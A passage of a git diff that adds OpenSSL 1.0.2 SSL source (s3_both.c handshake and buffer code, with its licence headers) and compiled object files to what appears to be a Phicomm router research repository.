+                                   unsigned char *to, int padding)
+{
+    RSA *rsa;
+    int i;
+
+    if ((c == NULL) || (c->pkeys[SSL_PKEY_RSA_ENC].privatekey == NULL)) {
+        SSLerr(SSL_F_SSL_RSA_PRIVATE_DECRYPT, SSL_R_NO_PRIVATEKEY);
+        return (-1);
+    }
+    if (c->pkeys[SSL_PKEY_RSA_ENC].privatekey->type != EVP_PKEY_RSA) {
+        SSLerr(SSL_F_SSL_RSA_PRIVATE_DECRYPT, SSL_R_PUBLIC_KEY_IS_NOT_RSA);
+        return (-1);
+    }
+    rsa = c->pkeys[SSL_PKEY_RSA_ENC].privatekey->pkey.rsa;
+
+    /* we have the public key */
+    i = RSA_private_decrypt(len, from, to, rsa, padding);
+    if (i < 0)
+        SSLerr(SSL_F_SSL_RSA_PRIVATE_DECRYPT, ERR_R_RSA_LIB);
+    return (i);
+}
+#else                           /* !OPENSSL_NO_SSL2 */
+
+# if PEDANTIC
+static void *dummy = &dummy;
+# endif
+
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/s2_srvr.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/s2_srvr.o
new file mode 100644
index 0000000000000000000000000000000000000000..9f909ff7d794e1c33d34e643986e7533ee95a9d1
GIT binary patch
literal 1080
zcmbVLO-sW-5S=vj`=U3&OFXG)m$WLP2MLtgi-?zk;6aiY6iSkk-4uJ#zu?dD*uUg2
z(3xZxm)+Du2PSXl?R&G6P5Uvpy=gfPsBqvK{wl=+d}(A*(E)722Eef2zw!=8QJIO-
zyJV-#?{qK9s_ee^eCD4W)pXsfjj)Zmf;qe!K?`6`oQwHi(D7~f{%O*<jT2K(?A{RW
zg45h;D%;?~s!bx};zU;P-V-mT1&aX~pQR#<5Jgert6GWVO#piiMF=e799W#EX_6tA
z<sxBtGaW9%cr5FetYniSpCpBtStl+<?4gV9)O@pGK{xI5SBian5@&w5pxU(`rvCsX
z>zK>>PtZ#}eM~(9Ssd#muGRSp&oxe$j`c!YE1#kUxLCt9e_<0T@FXgrch!UXnO@re
rl%lyr@~I?hSMvDJv+j<z?&Y9cQm4S2e+M_ryC?0V6h0`UMAQEZ1%^2<

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/s3_both.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/s3_both.c
new file mode 100644
index 0000000..c92fd72
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/s3_both.c
@@ -0,0 +1,747 @@
+/* ssl/s3_both.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+/* ====================================================================
+ * Copyright (c) 1998-2002 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+/* ====================================================================
+ * Copyright 2002 Sun Microsystems, Inc. ALL RIGHTS RESERVED.
+ * ECC cipher suite support in OpenSSL originally developed by
+ * SUN MICROSYSTEMS, INC., and contributed to the OpenSSL project.
+ */
+
+#include <limits.h>
+#include <string.h>
+#include <stdio.h>
+#include "ssl_locl.h"
+#include <openssl/buffer.h>
+#include <openssl/rand.h>
+#include <openssl/objects.h>
+#include <openssl/evp.h>
+#include <openssl/x509.h>
+
+/*
+ * send s->init_buf in records of type 'type' (SSL3_RT_HANDSHAKE or
+ * SSL3_RT_CHANGE_CIPHER_SPEC)
+ */
+int ssl3_do_write(SSL *s, int type)
+{
+    int ret;
+
+    ret = ssl3_write_bytes(s, type, &s->init_buf->data[s->init_off],
+                           s->init_num);
+    if (ret < 0)
+        return (-1);
+    if (type == SSL3_RT_HANDSHAKE)
+        /*
+         * should not be done for 'Hello Request's, but in that case we'll
+         * ignore the result anyway
+         */
+        ssl3_finish_mac(s, (unsigned char *)&s->init_buf->data[s->init_off],
+                        ret);
+
+    if (ret == s->init_num) {
+        if (s->msg_callback)
+            s->msg_callback(1, s->version, type, s->init_buf->data,
+                            (size_t)(s->init_off + s->init_num), s,
+                            s->msg_callback_arg);
+        return (1);
+    }
+    s->init_off += ret;
+    s->init_num -= ret;
+    return (0);
+}
+
+int ssl3_send_finished(SSL *s, int a, int b, const char *sender, int slen)
+{
+    unsigned char *p;
+    int i;
+    unsigned long l;
+
+    if (s->state == a) {
+        p = ssl_handshake_start(s);
+
+        i = s->method->ssl3_enc->final_finish_mac(s,
+                                                  sender, slen,
+                                                  s->s3->tmp.finish_md);
+        if (i == 0)
+            return 0;
+        s->s3->tmp.finish_md_len = i;
+        memcpy(p, s->s3->tmp.finish_md, i);
+        l = i;
+
+        /*
+         * Copy the finished so we can use it for renegotiation checks
+         */
+        if (s->type == SSL_ST_CONNECT) {
+            OPENSSL_assert(i <= EVP_MAX_MD_SIZE);
+            memcpy(s->s3->previous_client_finished, s->s3->tmp.finish_md, i);
+            s->s3->previous_client_finished_len = i;
+        } else {
+            OPENSSL_assert(i <= EVP_MAX_MD_SIZE);
+            memcpy(s->s3->previous_server_finished, s->s3->tmp.finish_md, i);
+            s->s3->previous_server_finished_len = i;
+        }
+
+#ifdef OPENSSL_SYS_WIN16
+        /*
+         * MSVC 1.5 does not clear the top bytes of the word unless I do
+         * this.
+         */
+        l &= 0xffff;
+#endif
+        ssl_set_handshake_header(s, SSL3_MT_FINISHED, l);
+        s->state = b;
+    }
+
+    /* SSL3_ST_SEND_xxxxxx_HELLO_B */
+    return ssl_do_write(s);
+}
+
+#ifndef OPENSSL_NO_NEXTPROTONEG
+/*
+ * ssl3_take_mac calculates the Finished MAC for the handshakes messages seen
+ * to far.
+ */
+static void ssl3_take_mac(SSL *s)
+{
+    const char *sender;
+    int slen;
+    /*
+     * If no new cipher setup return immediately: other functions will set
+     * the appropriate error.
+     */
+    if (s->s3->tmp.new_cipher == NULL)
+        return;
+    if (s->state & SSL_ST_CONNECT) {
+        sender = s->method->ssl3_enc->server_finished_label;
+        slen = s->method->ssl3_enc->server_finished_label_len;
+    } else {
+        sender = s->method->ssl3_enc->client_finished_label;
+        slen = s->method->ssl3_enc->client_finished_label_len;
+    }
+
+    s->s3->tmp.peer_finish_md_len = s->method->ssl3_enc->final_finish_mac(s,
+                                                                          sender,
+                                                                          slen,
+                                                                          s->s3->tmp.peer_finish_md);
+}
+#endif
+
+int ssl3_get_finished(SSL *s, int a, int b)
+{
+    int al, i, ok;
+    long n;
+    unsigned char *p;
+
+#ifdef OPENSSL_NO_NEXTPROTONEG
+    /*
+     * the mac has already been generated when we received the change cipher
+     * spec message and is in s->s3->tmp.peer_finish_md
+     */
+#endif
+
+    /* 64 argument should actually be 36+4 :-) */
+    n = s->method->ssl_get_message(s, a, b, SSL3_MT_FINISHED, 64, &ok);
+
+    if (!ok)
+        return ((int)n);
+
+    /* If this occurs, we have missed a message */
+    if (!s->s3->change_cipher_spec) {
+        al = SSL_AD_UNEXPECTED_MESSAGE;
+        SSLerr(SSL_F_SSL3_GET_FINISHED, SSL_R_GOT_A_FIN_BEFORE_A_CCS);
+        goto f_err;
+    }
+    s->s3->change_cipher_spec = 0;
+
+    p = (unsigned char *)s->init_msg;
+    i = s->s3->tmp.peer_finish_md_len;
+
+    if (i != n) {
+        al = SSL_AD_DECODE_ERROR;
+        SSLerr(SSL_F_SSL3_GET_FINISHED, SSL_R_BAD_DIGEST_LENGTH);
+        goto f_err;
+    }
+
+    if (CRYPTO_memcmp(p, s->s3->tmp.peer_finish_md, i) != 0) {
+        al = SSL_AD_DECRYPT_ERROR;
+        SSLerr(SSL_F_SSL3_GET_FINISHED, SSL_R_DIGEST_CHECK_FAILED);
+        goto f_err;
+    }
+
+    /*
+     * Copy the finished so we can use it for renegotiation checks
+     */
+    if (s->type == SSL_ST_ACCEPT) {
+        OPENSSL_assert(i <= EVP_MAX_MD_SIZE);
+        memcpy(s->s3->previous_client_finished, s->s3->tmp.peer_finish_md, i);
+        s->s3->previous_client_finished_len = i;
+    } else {
+        OPENSSL_assert(i <= EVP_MAX_MD_SIZE);
+        memcpy(s->s3->previous_server_finished, s->s3->tmp.peer_finish_md, i);
+        s->s3->previous_server_finished_len = i;
+    }
+
+    return (1);
+ f_err:
+    ssl3_send_alert(s, SSL3_AL_FATAL, al);
+    return (0);
+}
+
+/*-
+ * for these 2 messages, we need to
+ * ssl->enc_read_ctx                    re-init
+ * ssl->s3->read_sequence               zero
+ * ssl->s3->read_mac_secret             re-init
+ * ssl->session->read_sym_enc           assign
+ * ssl->session->read_compression       assign
+ * ssl->session->read_hash              assign
+ */
+int ssl3_send_change_cipher_spec(SSL *s, int a, int b)
+{
+    unsigned char *p;
+
+    if (s->state == a) {
+        p = (unsigned char *)s->init_buf->data;
+        *p = SSL3_MT_CCS;
+        s->init_num = 1;
+        s->init_off = 0;
+
+        s->state = b;
+    }
+
+    /* SSL3_ST_CW_CHANGE_B */
+    return (ssl3_do_write(s, SSL3_RT_CHANGE_CIPHER_SPEC));
+}
+
+unsigned long ssl3_output_cert_chain(SSL *s, CERT_PKEY *cpk)
+{
+    unsigned char *p;
+    unsigned long l = 3 + SSL_HM_HEADER_LENGTH(s);
+
+    if (!ssl_add_cert_chain(s, cpk, &l))
+        return 0;
+
+    l -= 3 + SSL_HM_HEADER_LENGTH(s);
+    p = ssl_handshake_start(s);
+    l2n3(l, p);
+    l += 3;
+    ssl_set_handshake_header(s, SSL3_MT_CERTIFICATE, l);
+    return l + SSL_HM_HEADER_LENGTH(s);
+}
+
+/*
+ * Obtain handshake message of message type 'mt' (any if mt == -1), maximum
+ * acceptable body length 'max'. The first four bytes (msg_type and length)
+ * are read in state 'st1', the body is read in state 'stn'.
+ */
+long ssl3_get_message(SSL *s, int st1, int stn, int mt, long max, int *ok)
+{
+    unsigned char *p;
+    unsigned long l;
+    long n;
+    int i, al;
+
+    if (s->s3->tmp.reuse_message) {
+        s->s3->tmp.reuse_message = 0;
+        if ((mt >= 0) && (s->s3->tmp.message_type != mt)) {
+            al = SSL_AD_UNEXPECTED_MESSAGE;
+            SSLerr(SSL_F_SSL3_GET_MESSAGE, SSL_R_UNEXPECTED_MESSAGE);
+            goto f_err;
+        }
+        *ok = 1;
+        s->state = stn;
+        s->init_msg = s->init_buf->data + 4;
+        s->init_num = (int)s->s3->tmp.message_size;
+        return s->init_num;
+    }
+
+    p = (unsigned char *)s->init_buf->data;
+
+    if (s->state == st1) {      /* s->init_num < 4 */
+        int skip_message;
+
+        do {
+            while (s->init_num < 4) {
+                i = s->method->ssl_read_bytes(s, SSL3_RT_HANDSHAKE,
+                                              &p[s->init_num],
+                                              4 - s->init_num, 0);
+                if (i <= 0) {
+                    s->rwstate = SSL_READING;
+                    *ok = 0;
+                    return i;
+                }
+                s->init_num += i;
+            }
+
+            skip_message = 0;
+            if (!s->server)
+                if (p[0] == SSL3_MT_HELLO_REQUEST)
+                    /*
+                     * The server may always send 'Hello Request' messages --
+                     * we are doing a handshake anyway now, so ignore them if
+                     * their format is correct. Does not count for 'Finished'
+                     * MAC.
+                     */
+                    if (p[1] == 0 && p[2] == 0 && p[3] == 0) {
+                        s->init_num = 0;
+                        skip_message = 1;
+
+                        if (s->msg_callback)
+                            s->msg_callback(0, s->version, SSL3_RT_HANDSHAKE,
+                                            p, 4, s, s->msg_callback_arg);
+                    }
+        }
+        while (skip_message);
+
+        /* s->init_num == 4 */
+
+        if ((mt >= 0) && (*p != mt)) {
+            al = SSL_AD_UNEXPECTED_MESSAGE;
+            SSLerr(SSL_F_SSL3_GET_MESSAGE, SSL_R_UNEXPECTED_MESSAGE);
+            goto f_err;
+        }
+
+        s->s3->tmp.message_type = *(p++);
+
+        n2l3(p, l);
+        if (l > (unsigned long)max) {
+            al = SSL_AD_ILLEGAL_PARAMETER;
+            SSLerr(SSL_F_SSL3_GET_MESSAGE, SSL_R_EXCESSIVE_MESSAGE_SIZE);
+            goto f_err;
+        }
+        if (l > (INT_MAX - 4)) { /* BUF_MEM_grow takes an 'int' parameter */
+            al = SSL_AD_ILLEGAL_PARAMETER;
+            SSLerr(SSL_F_SSL3_GET_MESSAGE, SSL_R_EXCESSIVE_MESSAGE_SIZE);
+            goto f_err;
+        }
+        if (l && !BUF_MEM_grow_clean(s->init_buf, (int)l + 4)) {
+            SSLerr(SSL_F_SSL3_GET_MESSAGE, ERR_R_BUF_LIB);
+            goto err;
+        }
+        s->s3->tmp.message_size = l;
+        s->state = stn;
+
+        s->init_msg = s->init_buf->data + 4;
+        s->init_num = 0;
+    }
+
+    /* next state (stn) */
+    p = s->init_msg;
+    n = s->s3->tmp.message_size - s->init_num;
+    while (n > 0) {
+        i = s->method->ssl_read_bytes(s, SSL3_RT_HANDSHAKE, &p[s->init_num],
+                                      n, 0);
+        if (i <= 0) {
+            s->rwstate = SSL_READING;
+            *ok = 0;
+            return i;
+        }
+        s->init_num += i;
+        n -= i;
+    }
+
+#ifndef OPENSSL_NO_NEXTPROTONEG
+    /*
+     * If receiving Finished, record MAC of prior handshake messages for
+     * Finished verification.
+     */
+    if (*s->init_buf->data == SSL3_MT_FINISHED)
+        ssl3_take_mac(s);
+#endif
+
+    /* Feed this message into MAC computation. */
+    ssl3_finish_mac(s, (unsigned char *)s->init_buf->data, s->init_num + 4);
+    if (s->msg_callback)
+        s->msg_callback(0, s->version, SSL3_RT_HANDSHAKE, s->init_buf->data,
+                        (size_t)s->init_num + 4, s, s->msg_callback_arg);
+    *ok = 1;
+    return s->init_num;
+ f_err:
+    ssl3_send_alert(s, SSL3_AL_FATAL, al);
+ err:
+    *ok = 0;
+    return (-1);
+}
+
+int ssl_cert_type(X509 *x, EVP_PKEY *pkey)
+{
+    EVP_PKEY *pk;
+    int ret = -1, i;
+
+    if (pkey == NULL)
+        pk = X509_get_pubkey(x);
+    else
+        pk = pkey;
+    if (pk == NULL)
+        goto err;
+
+    i = pk->type;
+    if (i == EVP_PKEY_RSA) {
+        ret = SSL_PKEY_RSA_ENC;
+    } else if (i == EVP_PKEY_DSA) {
+        ret = SSL_PKEY_DSA_SIGN;
+    }
+#ifndef OPENSSL_NO_EC
+    else if (i == EVP_PKEY_EC) {
+        ret = SSL_PKEY_ECC;
+    }
+#endif
+    else if (i == NID_id_GostR3410_94 || i == NID_id_GostR3410_94_cc) {
+        ret = SSL_PKEY_GOST94;
+    } else if (i == NID_id_GostR3410_2001 || i == NID_id_GostR3410_2001_cc) {
+        ret = SSL_PKEY_GOST01;
+    } else if (x && (i == EVP_PKEY_DH || i == EVP_PKEY_DHX)) {
+        /*
+         * For DH two cases: DH certificate signed with RSA and DH
+         * certificate signed with DSA.
+         */
+        i = X509_certificate_type(x, pk);
+        if (i & EVP_PKS_RSA)
+            ret = SSL_PKEY_DH_RSA;
+        else if (i & EVP_PKS_DSA)
+            ret = SSL_PKEY_DH_DSA;
+    }
+
+ err:
+    if (!pkey)
+        EVP_PKEY_free(pk);
+    return (ret);
+}
+
+int ssl_verify_alarm_type(long type)
+{
+    int al;
+
+    switch (type) {
+    case X509_V_ERR_UNABLE_TO_GET_ISSUER_CERT:
+    case X509_V_ERR_UNABLE_TO_GET_CRL:
+    case X509_V_ERR_UNABLE_TO_GET_CRL_ISSUER:
+        al = SSL_AD_UNKNOWN_CA;
+        break;
+    case X509_V_ERR_UNABLE_TO_DECRYPT_CERT_SIGNATURE:
+    case X509_V_ERR_UNABLE_TO_DECRYPT_CRL_SIGNATURE:
+    case X509_V_ERR_UNABLE_TO_DECODE_ISSUER_PUBLIC_KEY:
+    case X509_V_ERR_ERROR_IN_CERT_NOT_BEFORE_FIELD:
+    case X509_V_ERR_ERROR_IN_CERT_NOT_AFTER_FIELD:
+    case X509_V_ERR_ERROR_IN_CRL_LAST_UPDATE_FIELD:
+    case X509_V_ERR_ERROR_IN_CRL_NEXT_UPDATE_FIELD:
+    case X509_V_ERR_CERT_NOT_YET_VALID:
+    case X509_V_ERR_CRL_NOT_YET_VALID:
+    case X509_V_ERR_CERT_UNTRUSTED:
+    case X509_V_ERR_CERT_REJECTED:
+        al = SSL_AD_BAD_CERTIFICATE;
+        break;
+    case X509_V_ERR_CERT_SIGNATURE_FAILURE:
+    case X509_V_ERR_CRL_SIGNATURE_FAILURE:
+        al = SSL_AD_DECRYPT_ERROR;
+        break;
+    case X509_V_ERR_CERT_HAS_EXPIRED:
+    case X509_V_ERR_CRL_HAS_EXPIRED:
+        al = SSL_AD_CERTIFICATE_EXPIRED;
+        break;
+    case X509_V_ERR_CERT_REVOKED:
+        al = SSL_AD_CERTIFICATE_REVOKED;
+        break;
+    case X509_V_ERR_OUT_OF_MEM:
+        al = SSL_AD_INTERNAL_ERROR;
+        break;
+    case X509_V_ERR_DEPTH_ZERO_SELF_SIGNED_CERT:
+    case X509_V_ERR_SELF_SIGNED_CERT_IN_CHAIN:
+    case X509_V_ERR_UNABLE_TO_GET_ISSUER_CERT_LOCALLY:
+    case X509_V_ERR_UNABLE_TO_VERIFY_LEAF_SIGNATURE:
+    case X509_V_ERR_CERT_CHAIN_TOO_LONG:
+    case X509_V_ERR_PATH_LENGTH_EXCEEDED:
+    case X509_V_ERR_INVALID_CA:
+        al = SSL_AD_UNKNOWN_CA;
+        break;
+    case X509_V_ERR_APPLICATION_VERIFICATION:
+        al = SSL_AD_HANDSHAKE_FAILURE;
+        break;
+    case X509_V_ERR_INVALID_PURPOSE:
+        al = SSL_AD_UNSUPPORTED_CERTIFICATE;
+        break;
+    default:
+        al = SSL_AD_CERTIFICATE_UNKNOWN;
+        break;
+    }
+    return (al);
+}
+
+#ifndef OPENSSL_NO_BUF_FREELISTS
+/*-
+ * On some platforms, malloc() performance is bad enough that you can't just
+ * free() and malloc() buffers all the time, so we need to use freelists from
+ * unused buffers.  Currently, each freelist holds memory chunks of only a
+ * given size (list->chunklen); other sized chunks are freed and malloced.
+ * This doesn't help much if you're using many different SSL option settings
+ * with a given context.  (The options affecting buffer size are
+ * max_send_fragment, read buffer vs write buffer,
+ * SSL_OP_MICROSOFT_BIG_WRITE_BUFFER, SSL_OP_NO_COMPRESSION, and
+ * SSL_OP_DONT_INSERT_EMPTY_FRAGMENTS.)  Using a separate freelist for every
+ * possible size is not an option, since max_send_fragment can take on many
+ * different values.
+ *
+ * If you are on a platform with a slow malloc(), and you're using SSL
+ * connections with many different settings for these options, and you need to
+ * use the SSL_MOD_RELEASE_BUFFERS feature, you have a few options:
+ *    - Link against a faster malloc implementation.
+ *    - Use a separate SSL_CTX for each option set.
+ *    - Improve this code.
+ */
+static void *freelist_extract(SSL_CTX *ctx, int for_read, int sz)
+{
+    SSL3_BUF_FREELIST *list;
+    SSL3_BUF_FREELIST_ENTRY *ent = NULL;
+    void *result = NULL;
+
+    CRYPTO_w_lock(CRYPTO_LOCK_SSL_CTX);
+    list = for_read ? ctx->rbuf_freelist : ctx->wbuf_freelist;
+    if (list != NULL && sz == (int)list->chunklen)
+        ent = list->head;
+    if (ent != NULL) {
+        list->head = ent->next;
+        result = ent;
+        if (--list->len == 0)
+            list->chunklen = 0;
+    }
+    CRYPTO_w_unlock(CRYPTO_LOCK_SSL_CTX);
+    if (!result)
+        result = OPENSSL_malloc(sz);
+    return result;
+}
+
+static void freelist_insert(SSL_CTX *ctx, int for_read, size_t sz, void *mem)
+{
+    SSL3_BUF_FREELIST *list;
+    SSL3_BUF_FREELIST_ENTRY *ent;
+
+    CRYPTO_w_lock(CRYPTO_LOCK_SSL_CTX);
+    list = for_read ? ctx->rbuf_freelist : ctx->wbuf_freelist;
+    if (list != NULL &&
+        (sz == list->chunklen || list->chunklen == 0) &&
+        list->len < ctx->freelist_max_len && sz >= sizeof(*ent)) {
+        list->chunklen = sz;
+        ent = mem;
+        ent->next = list->head;
+        list->head = ent;
+        ++list->len;
+        mem = NULL;
+    }
+
+    CRYPTO_w_unlock(CRYPTO_LOCK_SSL_CTX);
+    if (mem)
+        OPENSSL_free(mem);
+}
+#else
+# define freelist_extract(c,fr,sz) OPENSSL_malloc(sz)
+# define freelist_insert(c,fr,sz,m) OPENSSL_free(m)
+#endif
+
+int ssl3_setup_read_buffer(SSL *s)
+{
+    unsigned char *p;
+    size_t len, align = 0, headerlen;
+
+    if (SSL_version(s) == DTLS1_VERSION || SSL_version(s) == DTLS1_BAD_VER)
+        headerlen = DTLS1_RT_HEADER_LENGTH;
+    else
+        headerlen = SSL3_RT_HEADER_LENGTH;
+
+#if defined(SSL3_ALIGN_PAYLOAD) && SSL3_ALIGN_PAYLOAD!=0
+    align = (-SSL3_RT_HEADER_LENGTH) & (SSL3_ALIGN_PAYLOAD - 1);
+#endif
+
+    if (s->s3->rbuf.buf == NULL) {
+        len = SSL3_RT_MAX_PLAIN_LENGTH
+            + SSL3_RT_MAX_ENCRYPTED_OVERHEAD + headerlen + align;
+        if (s->options & SSL_OP_MICROSOFT_BIG_SSLV3_BUFFER) {
+            s->s3->init_extra = 1;
+            len += SSL3_RT_MAX_EXTRA;
+        }
+#ifndef OPENSSL_NO_COMP
+        if (!(s->options & SSL_OP_NO_COMPRESSION))
+            len += SSL3_RT_MAX_COMPRESSED_OVERHEAD;
+#endif
+        if ((p = freelist_extract(s->ctx, 1, len)) == NULL)
+            goto err;
+        s->s3->rbuf.buf = p;
+        s->s3->rbuf.len = len;
+    }
+
+    s->packet = &(s->s3->rbuf.buf[0]);
+    return 1;
+
+ err:
+    SSLerr(SSL_F_SSL3_SETUP_READ_BUFFER, ERR_R_MALLOC_FAILURE);
+    return 0;
+}
+
+int ssl3_setup_write_buffer(SSL *s)
+{
+    unsigned char *p;
+    size_t len, align = 0, headerlen;
+
+    if (SSL_version(s) == DTLS1_VERSION || SSL_version(s) == DTLS1_BAD_VER)
+        headerlen = DTLS1_RT_HEADER_LENGTH + 1;
+    else
+        headerlen = SSL3_RT_HEADER_LENGTH;
+
+#if defined(SSL3_ALIGN_PAYLOAD) && SSL3_ALIGN_PAYLOAD!=0
+    align = (-SSL3_RT_HEADER_LENGTH) & (SSL3_ALIGN_PAYLOAD - 1);
+#endif
+
+    if (s->s3->wbuf.buf == NULL) {
+        len = s->max_send_fragment
+            + SSL3_RT_SEND_MAX_ENCRYPTED_OVERHEAD + headerlen + align;
+#ifndef OPENSSL_NO_COMP
+        if (!(s->options & SSL_OP_NO_COMPRESSION))
+            len += SSL3_RT_MAX_COMPRESSED_OVERHEAD;
+#endif
+        if (!(s->options & SSL_OP_DONT_INSERT_EMPTY_FRAGMENTS))
+            len += headerlen + align + SSL3_RT_SEND_MAX_ENCRYPTED_OVERHEAD;
+
+        if ((p = freelist_extract(s->ctx, 0, len)) == NULL)
+            goto err;
+        s->s3->wbuf.buf = p;
+        s->s3->wbuf.len = len;
+    }
+
+    return 1;
+
+ err:
+    SSLerr(SSL_F_SSL3_SETUP_WRITE_BUFFER, ERR_R_MALLOC_FAILURE);
+    return 0;
+}
+
+int ssl3_setup_buffers(SSL *s)
+{
+    if (!ssl3_setup_read_buffer(s))
+        return 0;
+    if (!ssl3_setup_write_buffer(s))
+        return 0;
+    return 1;
+}
+
+int ssl3_release_write_buffer(SSL *s)
+{
+    if (s->s3->wbuf.buf != NULL) {
+        freelist_insert(s->ctx, 0, s->s3->wbuf.len, s->s3->wbuf.buf);
+        s->s3->wbuf.buf = NULL;
+    }
+    return 1;
+}
+
+int ssl3_release_read_buffer(SSL *s)
+{
+    if (s->s3->rbuf.buf != NULL) {
+        freelist_insert(s->ctx, 1, s->s3->rbuf.len, s->s3->rbuf.buf);
+        s->s3->rbuf.buf = NULL;
+    }
+    return 1;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/s3_both.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/s3_both.o
new file mode 100644
index 0000000000000000000000000000000000000000..19daf8fcc1e6f43b953983102311df652b3c4fe0
GIT binary patch
literal 8560
zcmbta4R9Mr6+TH$tfb+rmNXcewt@)8PFo?xEsbdmK1+&Mt(+)voH&1+W%&|&;vXU1
zH4f7@Di?(u7eg7^nY1uN+6hqphA_|)yQ!l#NuBUpp!}8@($Zn#m=H=@H>4%vy}dnq
zeX(E$UPs#9Z{Od(xBGVGbayPV((Q5yHo1h43DYAR6@<e#PWKyWw^67PL_unkj5kLY
z03xl68}A&O2fa38{B$_u7KBz}{E7@+kL*(NEH-g-PrwH=vBLRyRdi3l3w=^3svjYy
zj}(5X&LQ=G&}z-3SGw!rfB=)Z#YBI*^4>+nB)-z~#Hc1li(n+Z#OU^g&kx@ZEY$k3
z`JkQIqLxVEyjr!17#B8gm9|J*$I*Jb)juw+8{Q0pQ~nyiW|FPOMXGIvuZ5SVT#bca
